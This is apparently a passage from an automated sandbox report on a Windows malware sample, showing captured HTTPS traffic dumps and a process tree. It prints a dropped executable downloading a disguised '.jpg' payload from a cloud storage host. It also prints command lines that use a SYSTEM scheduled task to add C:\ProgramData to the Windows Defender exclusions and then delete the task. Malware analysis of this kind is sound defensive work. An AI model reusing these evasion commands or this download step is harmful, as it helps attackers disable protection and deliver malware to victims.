a4 27 3e 2c 7c 5a 6b f3 21 34 52 4f 12 6e 97 99 0b 32 20 48 ad 50 69 a7 06 6a 8b 46 53 7e 44 e7 8d 63 9d 43 d3 36 f2 39 ef 4b 76 db 20 c3 a9 cd f4 6d Data Ascii: }:-\~:xT;h?"\RWW=S,HY{tukmSU\W3[}{3S?zkK[\.uzmAFrDpl8:OgS]E'x,T$$b2iV"yy'>,\|Zk!4ROn2 HPijFS~DcC69Kv m
2025-01-13 12:55:35 UTC	4096	IN	Data Raw: 5c f2 f3 f2 cb a8 4e 59 1d d2 ce 66 43 81 7b ff 67 50 14 99 fb dd 4e 2d 27 1b 3b 32 e1 3d 33 3a 03 dd 71 52 2f 3d b3 f7 09 f2 37 09 35 05 d2 00 d7 a7 6e a2 5b 79 ad 9f 96 b5 c6 ed 9d 66 b3 39 53 74 34 ad bd bc 93 b3 fe 71 77 93 a5 84 18 86 55 55 ba d3 80 5c 53 d8 33 71 4b ee a2 49 17 31 de 70 f5 2e 3f d4 1a 6a 27 35 da f8 c9 29 d3 3d 14 a5 d5 dd 18 d9 f7 74 d2 59 bd 8b 6e 18 e6 02 30 b1 d7 f9 6b fa e2 61 91 0a 36 8b dc 30 3b 0f bb de d3 87 8c 44 53 a3 22 0d aa a3 e3 13 d4 68 4b 97 1e 19 a2 5f ef 4f 5c 9c 5f 83 e2 ed 0e 6b 27 d3 18 e0 1f 57 f6 99 4e 8f 66 e4 e9 d6 c4 39 a5 10 98 95 71 d9 7b bc 71 9c 9c 89 c1 9c 58 3a b4 2b 66 f8 3c 84 df 79 ba 43 96 ad af 4f c6 9e 70 72 72 50 0a 98 50 ac 17 9d c0 f8 94 89 96 25 87 df 01 09 25 05 6d 3f 30 e0 76 8e 06 07 6c Data Ascii: \NYfC{gPN-';2=3:qR/=75n[yf9St4qwUU\S3qKI1p.?j'5)=tYn0ka60;DS"hK_O\_k'WNf9q{qX:+f<yCOprrPP%%m?0vl
2025-01-13 12:55:35 UTC	4096	IN	Data Raw: 20 fb 64 56 1a 91 6e df 20 2c 89 77 e2 e2 05 39 f2 8e f5 00 2d 52 de 02 01 04 ca 1a ce 6a d2 47 a1 f6 d0 fe 59 5f 7b be ab de 7e b5 7b 3a bc 5c 60 b4 14 c4 40 8e 4f 1b d3 50 30 ca 88 05 19 87 a6 6c 44 9c 38 ec 39 0e 59 7b 02 e0 f1 72 5e f5 ad 67 1a cd 99 59 ab ba 5e 62 b2 6a a6 96 6c 3f b0 7f 47 31 af f9 8d b1 e6 2c 04 cc 68 ac 20 ea 27 da fc 3a c9 29 c2 2d 03 bc 6d b2 50 da 12 b2 4e b6 81 da 21 4d f8 86 bb 30 9c c3 3a 42 00 c7 75 98 22 d5 e2 ed f7 ca c4 d5 09 a4 4e 82 04 d4 70 9c 5e b4 e3 6c a8 46 17 b5 25 7a 7b b5 5c 61 52 62 b2 1a fe 80 42 8b a0 8b af 69 84 9a 79 9f 8b 45 e0 9d 05 e1 0c 2d e5 1f 50 b8 e2 04 38 e7 df 32 37 b0 48 b1 af 82 c3 27 a8 d2 aa e1 62 df e9 b2 a2 12 f5 be 96 d6 5d 5d 4d 27 3a 1a 32 92 06 ad 9a 5b a6 db 14 ee 80 13 e1 a7 67 c5 71 Data Ascii: dVn ,w9-RjGY_{~{:\`@OP0lD89Y{r^gY^bjl?G1,h ':)-mPN!M0:Bu"Np^lF%z{\aRbBiyE-P827H'b]]M':2[gq
2025-01-13 12:55:35 UTC	4096	IN	Data Raw: 11 ac 16 c6 07 c4 9d 58 cd bb f4 f0 2b 3a 16 5a da 8a 33 81 27 42 b4 e4 1c b3 44 f3 eb 30 85 ed 13 a0 b4 46 35 68 06 83 59 2b bf 9b 83 03 97 31 12 15 bc 78 b1 76 b9 71 21 32 04 6b 81 a4 83 32 6f d6 69 98 27 df ea f9 0c 4f 4b 67 2f 4b 06 67 44 04 ef 78 60 0a 1a 43 f5 40 32 c2 0d 65 17 e5 08 cc a8 23 c1 d9 dd 70 6e 88 fc 7f 8d 81 6d 3c 8a c0 7c 8f 3d 55 13 79 ca fa 4f 7d 9f 59 1f ab 7a 58 3c b6 7e 0a 9f 2b 23 7e 6a 96 9f 38 e0 63 e5 5a 1a 32 5b b4 2a 2e c8 4b fc 30 60 d4 a2 2b 2b bb 40 ab 29 c3 47 5a c5 72 2a 67 22 60 fd 3a 2c 8c 49 94 ad 10 8c f4 1c aa 13 b2 44 63 6e 0d 2e 1c 0e 75 75 75 69 83 57 e4 6c 56 e5 7f 18 20 b8 d1 37 88 2a 1b 65 fe 57 b8 31 b5 b2 3c d8 01 d7 18 1c 20 44 7d d7 1c 11 ca 50 b1 34 77 e7 17 39 01 6f c0 e8 d3 94 88 53 e8 54 bc 80 c3 59 Data Ascii: X+:Z3'BD0F5hY+1xvq!2k2oi'OKg/KgDx`C@2e#pnm<\|=UyO}YzX<~+#~j8cZ2[.K0`++@)GZrg"`:,IDcn.uuuiWlV 7*eW1< D}P4w9oSTY
2025-01-13 12:55:35 UTC	4096	IN	Data Raw: ef cc 4c d0 d3 09 06 21 8c 0a e4 fd 58 ee 29 db 81 82 6d c1 a4 30 bc c1 88 36 cd ab 62 b5 32 ab fb fb ec 20 e3 1f be d1 52 c7 7b bf 58 54 f3 43 f2 8d 0e 8b f7 13 10 a0 bb 4f ee a1 7a 27 8f 37 90 b6 93 e7 12 94 df b3 75 98 ed 5e 3f 26 b3 6b dc e4 4b ac 06 65 59 29 76 21 46 e6 59 50 ec 8d 23 41 76 61 bd b4 2a c0 a1 d0 00 7d 85 b9 46 a9 73 14 b0 38 5b 50 8e c5 4d 41 4e b1 33 ec 52 c8 9b 60 d6 75 f5 94 ee 23 f4 6f f6 e6 d2 e9 4d 56 be d7 e4 8f 26 6e aa 79 e5 e6 5e 13 6c 17 b6 e2 e2 11 f5 fe 7e 0b 44 9b c6 aa 3a f9 70 8c 7b bc 07 41 a6 db 37 9c 40 ed 30 d4 63 08 f2 34 c3 bc 19 00 1b 0e a0 05 0a d9 18 ea e0 fd 6c 8a 5d c5 2d 44 59 87 c8 6a f8 9f 94 42 5d b7 0d 78 f1 3b 58 f0 58 03 2c 94 05 87 6d 14 59 c3 c8 52 68 6d 20 54 3c df df dd d3 b3 5e da 3a d6 ef ef f3 Data Ascii: L!X)m06b2 R{XTCOz'7u^?&kKeY)v!FYP#Ava*}Fs8[PMAN3R`u#oMV&ny^l~D:p{A7@0c4l]-DYjB]x;XX,mYRhm T<^:
2025-01-13 12:55:35 UTC	4096	IN	Data Raw: 15 03 58 89 56 b4 b6 a2 ad 03 9c f1 67 d1 75 f3 e8 19 38 39 86 89 50 71 f6 9c 55 6e f0 3c 79 b6 4b a6 36 b9 b4 a2 ab 24 ae 39 77 96 dd 86 d0 fd 7d 97 cb 0d f0 c5 e3 02 f9 c1 52 24 d9 92 d5 0f ce ba 02 8d 60 9d a4 7e 46 0c f6 07 7e 6e 99 9f b7 49 61 ff 7c c2 1d c4 45 e2 10 ab 9d 5d f3 48 c7 32 f2 49 bd 7e 2c f3 14 b8 55 84 3b b6 cd f2 2c a2 4e c8 2f 6a 5f 90 af 64 33 93 34 22 de 67 0c 00 0a 07 58 6d 1d 91 a5 e8 77 57 3e 92 ad 64 db 25 db 5a a7 9e fb ee 37 1e bf 9f 1c 20 8f 58 83 8e 9c 9d 1a 84 f4 2f e8 b6 e9 fc 5c 14 cf 3d a8 20 c1 36 73 8b 6d ad fa 19 32 a5 19 e7 34 c8 51 2a b2 c7 6f 71 16 6b 1a c9 12 87 4a 5b 13 27 7e 0c 5d 42 3e 1f df 6d a6 94 82 5a 53 5e fd 07 49 a4 e3 fa f2 49 de ae 8b 50 62 d9 cf c2 ba 82 06 00 8f 34 6e 19 e8 d9 e4 90 5c e0 85 6f a3 Data Ascii: XVgu89PqUn<yK6$9w}R$`~F~nIa\|E]H2I~,U;,N/j_d34"gXmwW>d%Z7 X/\= 6sm24Q*oqkJ['~]B>mZS^IIPb4n\o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	50016	118.178.60.9	443	7228	C:\Users\user\Documents\RgZ5EJ.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:55:46 UTC	115	OUT	GET /FOM-53.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-13 12:55:46 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 12:55:46 GMT Content-Type: image/jpeg Content-Length: 366410 Connection: close x-oss-request-id: 67850D527CF842363446AC94 Accept-Ranges: bytes ETag: "DA1D5EB665D3AAD523BE59415E6449ED" Last-Modified: Tue, 22 Oct 2024 14:47:51 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 5641369857548672686 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q== x-oss-server-time: 2
2025-01-13 12:55:46 UTC	3550	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-13 12:55:46 UTC	4096	IN	Data Raw: 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 Data Ascii: ```````````````````````````````````````````````````````````````
2025-01-13 12:55:46 UTC	4096	IN	Data Raw: 60 60 eb 25 68 30 9f 75 d0 14 62 70 e9 25 84 e3 1d 84 60 15 67 52 a0 89 a9 60 60 60 06 67 e5 4c a2 a0 c6 2b ed ac f1 5f b5 0c d4 a2 b0 c6 29 e5 4e 2b f5 44 2b e2 ac 2b a8 2b b1 29 f5 10 8a f0 6d a5 0c b0 6b ad 34 6b b1 a8 b2 1f f5 2c 94 e2 f0 63 18 1f 95 e7 d2 20 09 68 e0 e0 e0 67 e5 5c a1 a0 a0 a0 ca a4 2d e5 5c f0 ca a8 c8 5f 5f a0 a0 2b ed 74 2b f1 e8 f2 5f b5 08 d4 a2 70 e5 a0 15 59 a7 25 b8 61 60 60 60 a7 25 bc 40 df 62 60 a7 25 80 e8 73 60 60 0a 60 0a 60 ed 25 48 f0 ca a0 ca a0 ca ac 2d ed 78 f1 c8 a4 a0 a0 38 2b f5 74 2b e2 e8 f0 5f b5 00 d4 a2 b0 2b ed 34 26 a1 b3 e1 8a e0 8a e0 8a e0 6b b5 34 b2 88 69 f7 e0 f0 8a e0 8a e0 08 da 10 e0 e0 63 24 fc 2b ed 74 29 e1 e4 10 a1 2b 45 fd 62 a8 a0 f5 2b 4c 18 b8 6a a0 a0 48 9a a7 a1 a0 f6 f7 2b e5 a8 e9 e5 Data Ascii: ``%h0ubp%`gR```gL+_)N+D+++)mk4k,c hg\-\__+t+_pY%a```%@b`%s````%H-x8+t+_+4&k4ic$+t)+Eb+LjH+
2025-01-13 12:55:46 UTC	4096	IN	Data Raw: 9d 9f 9f 31 ed f5 f4 9e 9f 9f 32 88 1d 9d 60 60 e3 a4 70 ed e5 f4 9e 9f 9f 30 ed ed 10 5d 5f 5f f1 5f b5 30 d2 a2 b0 ca a0 c8 20 a0 a0 a0 ca a2 ca a0 ca a2 c8 a0 a0 a0 e0 c8 a0 4c a2 f0 1f f5 74 92 e2 f0 69 65 84 1d 1f 1f 63 5d 84 1d 1f 1f 1f 95 e7 d3 20 09 0a e0 e0 e0 8a e0 6d 35 cc 5d 5f 5f f2 2b e5 a8 f0 48 06 5c a0 a0 23 64 a4 2b ed ac 8b 68 23 49 a1 f1 2b f5 a8 f2 48 f1 9c 60 60 e3 a4 64 eb 2d 68 ed 34 61 61 32 eb e5 04 9d 9f 9f 30 9f 75 f8 12 62 70 eb ed 04 9d 5f 5f f1 5f b5 44 d2 a2 b0 c8 54 a1 a0 a0 5f b5 6c d2 a2 b0 ca a1 c8 8c 4c a2 b0 48 61 5c 5f 5f 63 24 e8 8a e0 88 b8 0c e2 f0 08 dd 1b e0 e0 63 24 e8 63 18 1f 94 d0 8a e0 8a e0 8a e0 6d 75 18 5e 5f 5f f2 c8 24 4c a2 b0 ca a0 5f b5 a0 d3 a2 b0 ca a0 01 68 ec a5 b0 f0 5f b5 3c d2 a2 b0 ca 60 9f Data Ascii: 12``p0]___0 Ltiec] m5]__+H\#d+h#I+H``d-h4aa20ubp___DT_lLHa\__c$c$cmu^__$L_h_<`
2025-01-13 12:55:46 UTC	4096	IN	Data Raw: 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 44 45 46 47 48 49 4e 4e 4e 4a 4b 4e 8e 8e 8c 8d f5 2b 4c 21 4c 18 a2 a0 a0 29 2d e8 5d 5f 5f c8 ac 4e a2 b0 48 3e a3 a0 a0 23 64 a4 8a e0 88 f4 0e e2 f0 08 d5 0d 1f 1f 63 24 e8 8a e0 88 d0 0e e2 f0 08 c6 0d 1f 1f 63 24 e8 88 08 a3 a0 a0 5f b5 6c d2 a2 b0 c8 e8 4e a2 b0 5f b5 20 d2 a2 b0 c8 c0 4e a2 b0 5f b5 20 d2 a2 b0 c8 88 63 60 60 9f 75 ac 12 62 70 08 64 61 60 60 ed e5 98 9e 9f 9f 30 0a 60 9f 75 e4 12 62 70 a6 e5 24 5e 5f 5f eb 66 25 25 5e 5f 5f e5 66 25 26 5e 5f 5f f2 66 25 27 5e 5f 5f ee 66 25 28 5e 5f 5f a5 26 65 69 1e 1f 1f ac 26 65 6a 1e 1f 1f d3 26 65 6b 1e 1f 1f d2 26 65 6c 1e 1f 1f ce 26 65 6d 5e 5f 5f c4 66 25 2e 5e 5f 5f cc 66 25 2f 5e 5f 5f cc 66 25 30 5e 5f 5f a0 66 25 d4 5e 5f 5f e7 a6 e5 Data Ascii: NNNNNNNNNNNNNNNNNDEFGHINNNJKN+L!L)-]__NH>#dc$c$_lN_ N_ c``ubpda``0`ubp$^__f%%^__f%&^__f%'^__f%(^__&ei&ej&ek&el&em^__f%.^__f%/^__f%0^__f%^__
2025-01-13 12:55:46 UTC	4096	IN	Data Raw: 90 12 62 70 d8 61 60 60 60 8b 62 8b 80 eb 85 3d a3 35 eb 8c e3 8c 08 37 eb 25 68 e9 25 38 66 e5 3c a0 19 b8 a0 a0 a0 93 60 2d dd 3d 53 0b c6 0b 0a ca c4 2b ed 38 f1 2d f5 3c f2 48 92 2f e0 e0 63 24 ec 6d a5 7c b0 6b ed 28 09 e2 f0 b1 88 78 a5 e5 f0 6b b5 78 63 22 84 b2 08 df 1f 5f 5f 23 64 b0 93 60 ff 2b 45 fd 62 a4 a0 f5 2b 4c ca a0 01 68 49 a2 b0 f0 c8 38 e5 a5 b0 2b ed 68 31 88 7a 9f 9f 9f e3 a4 70 53 a0 3d a2 64 60 35 eb 8c 0a 60 c1 60 60 60 70 30 08 60 60 60 70 2b ed a8 f1 48 58 5e 5f 5f 23 64 b0 93 60 fd 62 a4 a0 f5 2b 4c 21 4c 80 a4 a0 a0 f7 c8 cc 4f a2 f0 1f f5 68 92 e2 f0 69 a5 18 d3 20 86 41 6a dd e5 f0 65 20 95 e5 09 a7 e1 e0 e0 d3 29 86 6b ed 2a 9d a5 b0 29 ed 5c 2b f5 5c 61 42 aa 29 f5 50 ca a0 c8 20 a0 a0 a0 ca a4 ca a0 ca a2 c8 a0 a0 60 20 Data Ascii: bpa```b=57%h%8f<`-=S+8-<H/c$m\|k(xkxc"__#d`+Eb+LhI8+h1zpS=d`5````p0```p+HX^__#d`b+L!LOhi Aje )k*)\+\aB)P `
2025-01-13 12:55:46 UTC	4096	IN	Data Raw: 60 60 eb 25 68 30 ed ed 40 9d 9f 9f 31 88 00 df 60 60 e3 a4 6c a6 e5 f8 9e 9f 9f 60 d9 f9 a0 a0 a0 93 60 2d 1d 39 5e 5f 5f 53 0b c6 0b 0a ca a0 ca a0 ca a2 ca a0 ca a1 c8 a0 a0 a0 e0 6d 75 cc 1e 1f 1f b2 1f f5 74 92 e2 f0 69 65 70 1e 1f 1f 63 5d 70 1e 1f 1f 1f 95 e7 d3 20 09 11 a0 a0 a0 ca a0 2d 25 34 5e 5f 5f f0 2b ed ac 21 49 d0 a1 a0 a0 f1 2b f5 a8 21 62 d0 a1 a0 a0 f2 eb e5 f0 9e 9f 9f 30 9f 75 f8 12 62 70 e5 a0 15 67 53 a0 89 dc 60 60 60 eb ed f0 9e 9f 9f 31 9f b5 a4 ed a5 b0 2d 35 88 5d 5f 5f f2 48 c4 6c a0 a0 23 64 a4 25 60 d4 85 2d 25 88 5d 5f 5f f0 2d 6d cc 1e 1f 1f b1 88 6c 11 e2 f0 6d 75 78 1e 1f 1f b2 1f f5 b4 ad e5 f0 63 24 f0 0b f4 6d 65 cc 5e 5f 5f f0 2d 2d 38 5e 5f 5f f1 5f b5 68 d2 a2 b0 2b 35 84 5d 5f 5f 29 35 bc 5d 5f 5f 23 1d bc 9d 9f Data Ascii: ``%h0@1``l``-9^__Smutiepc]p -%4^__+!I+!b0ubpgS```1-5]__Hl#d%`-%]__-mlmuxc$me^__--8^___h+5]__)5]__#
2025-01-13 12:55:46 UTC	4096	IN	Data Raw: ac ac 35 eb 8c 53 a0 c0 4c c6 65 70 e3 80 61 e5 a0 15 6f ea 6d 4c c6 65 70 e0 a9 61 e8 ad 8c 06 a5 b0 fd 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 ac 2a e8 6b b5 1c 68 ea 8a e0 6b ad 1c 08 f5 e2 e0 e0 6b a5 e8 b0 6b ad 1c 08 a9 e1 e0 e0 6b a5 1c 6b 45 fd 62 a8 a0 f5 2b 4c f1 29 ed 5c ca a1 2b ed 5c 48 4f a1 a0 a0 2b 45 fd 63 6c 6c 6c 6c 6c 6c ac ac ac ac ac 35 eb 8c 31 e9 2d 9c ea 25 68 30 0a 61 eb 2d 9c 88 eb 60 60 60 eb 85 3d a2 64 60 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 5c 2b e8 a8 9b ed a8 d7 a5 48 c2 c9 a1 a0 2b ed 5c 48 f1 e1 e0 e0 6b b5 1c 6b a2 e4 e3 a5 e8 6b 05 bd 22 e4 e0 2c 2c b5 6b 0c 63 0c e8 69 ad 1c 6b a5 5c 23 d8 a4 a0 d5 aa 48 c9 a1 a0 a0 29 e5 58 4b a9 2b ed 5c 2b f1 a4 29 f5 58 2b e5 58 2b 45 fd a3 ac Data Ascii: 5SLepaomLepacllllllllllllll+L)\+*khkkkkkEb+L)\+\HO+Ecllllll51-%h0a-```=d`lllll+L)\+\+H+\Hkkk",,kcik\#H)XK+\+)X+X+E
2025-01-13 12:55:46 UTC	4096	IN	Data Raw: e3 98 1d 15 6a a7 65 0c 94 62 70 60 60 60 60 e3 5d 0c 94 62 70 60 14 41 08 12 74 60 60 5f b5 6c d2 a2 b0 2b 2d 44 5e 5f 5f 48 7c 5c 5f 5f 2b 2d 44 5e 5f 5f 48 ff 5d 5f 5f 2b ed 54 c4 69 ed e0 e0 e0 e0 bf be bb 6b 05 bd 22 e8 e0 2c 2c 2c 2c 2c 2c b5 6b 0c b1 69 ad 1c 6b ad 1c 08 23 5c 5f 5f 2b e5 a8 23 40 a1 25 60 d4 ac 2b ed 5c f1 48 53 3e a0 a0 23 64 a4 2b e5 5c 2b 45 fd a2 64 60 ac ac 35 eb 8c 88 67 60 60 60 88 71 60 60 60 3d a3 35 eb 8c d9 ad 2c 65 70 88 75 3c 61 a0 fd 63 f5 2b 4c c8 f0 d7 a0 b0 48 10 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6d ec a5 b0 48 d3 fd e1 e0 bd 23 b5 6b 0c 08 e7 e0 e0 e0 08 f1 e0 e0 e0 bd 23 b5 6b 0c 59 2c ac e5 f0 08 30 89 e1 e0 fd 63 f5 2b 4c c8 2f d7 a0 b0 48 d1 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6c ec a5 b0 48 90 cb a1 60 3d Data Ascii: jebp````]bp`At``_l+-D^__H\|\__+-D^__H]__+Tik",,,,,,kik#\__+#@%`+\HS>#d+\+Ed`5g```q```=5,epu<ac+LH#dc+LmH#k#kY,0c+L/H#dc+LlH`=
2025-01-13 12:55:46 UTC	4096	IN	Data Raw: 25 d0 30 9f 75 4c 10 62 70 eb 2d f8 e9 2d e4 eb 35 d0 32 9f 75 84 12 62 70 eb 25 cc 30 5f b5 44 d2 a2 b0 2b ed 24 29 ed 18 4b a7 67 e5 18 a0 a0 a0 a0 23 dd 14 a0 d4 aa 2b f5 14 f2 5f f5 ec 92 e2 f0 6b a5 58 6b 05 bd 23 b5 6b 0c 61 0c 7c e5 e0 e0 88 df 68 e0 f0 88 50 3d e4 f0 1f b5 80 d0 a2 b0 03 54 ed a5 b0 67 a5 58 ed a5 b0 80 a0 a0 a0 67 a5 a0 ee a5 b0 a7 a0 a0 a0 67 a5 64 2e 65 70 60 60 60 60 a7 65 70 2e 65 70 b0 67 60 60 a7 65 6c 2e 65 70 61 60 60 60 a7 65 9c 2d a5 b0 a2 a0 a0 a0 c8 58 ed a5 b0 01 54 ed a5 b0 f0 5f b5 c4 d0 a2 b0 67 a5 ac ee a5 b0 a0 a0 a0 e0 88 14 e1 e0 e0 1f f5 2c 92 e2 f0 27 65 8c 1f 1f 1f 74 e0 e0 e0 6d 6d 8c 1f 1f 1f b1 1f f5 f8 d2 a2 b0 23 1d d0 5f 5f 5f a6 d3 96 67 a5 5c ed a5 b0 a4 a0 a0 a0 c8 58 ed a5 b0 2b b5 54 ed a5 70 32 Data Ascii: %0uLbp--52ubp%0_D+$)Kg#+_kXk#ka\|hP=TgXggd.ep````ep.epg``el.epa```e-XT_g,'etmm#___g\X+Tp2

Target ID:	0
Start time:	07:53:24
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\149876985-734579485.05.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\149876985-734579485.05.exe"
Imagebase:	0x140000000
File size:	30'939'136 bytes
MD5 hash:	D21CED168A5267499378453EEE404703
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:54:25
Start date:	13/01/2025
Path:	C:\Users\user\Documents\RgZ5EJ.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\RgZ5EJ.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:55:01
Start date:	13/01/2025
Path:	C:\Users\user\Documents\RgZ5EJ.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\RgZ5EJ.exe
Imagebase:	0x140000000
File size:	133'136 bytes
MD5 hash:	D3709B25AFD8AC9B63CBD4E1E1D962B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	07:55:12
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff61e590000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:55:12
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:55:12
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:55:12
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Run /TN "Task1"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:55:12
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff7699e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:55:12
Start date:	13/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SCHTASKS /Delete /TN "Task1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	07:55:12
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	07:55:12
Start date:	13/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Imagebase:	0x7ff725ad0000
File size:	77'312 bytes
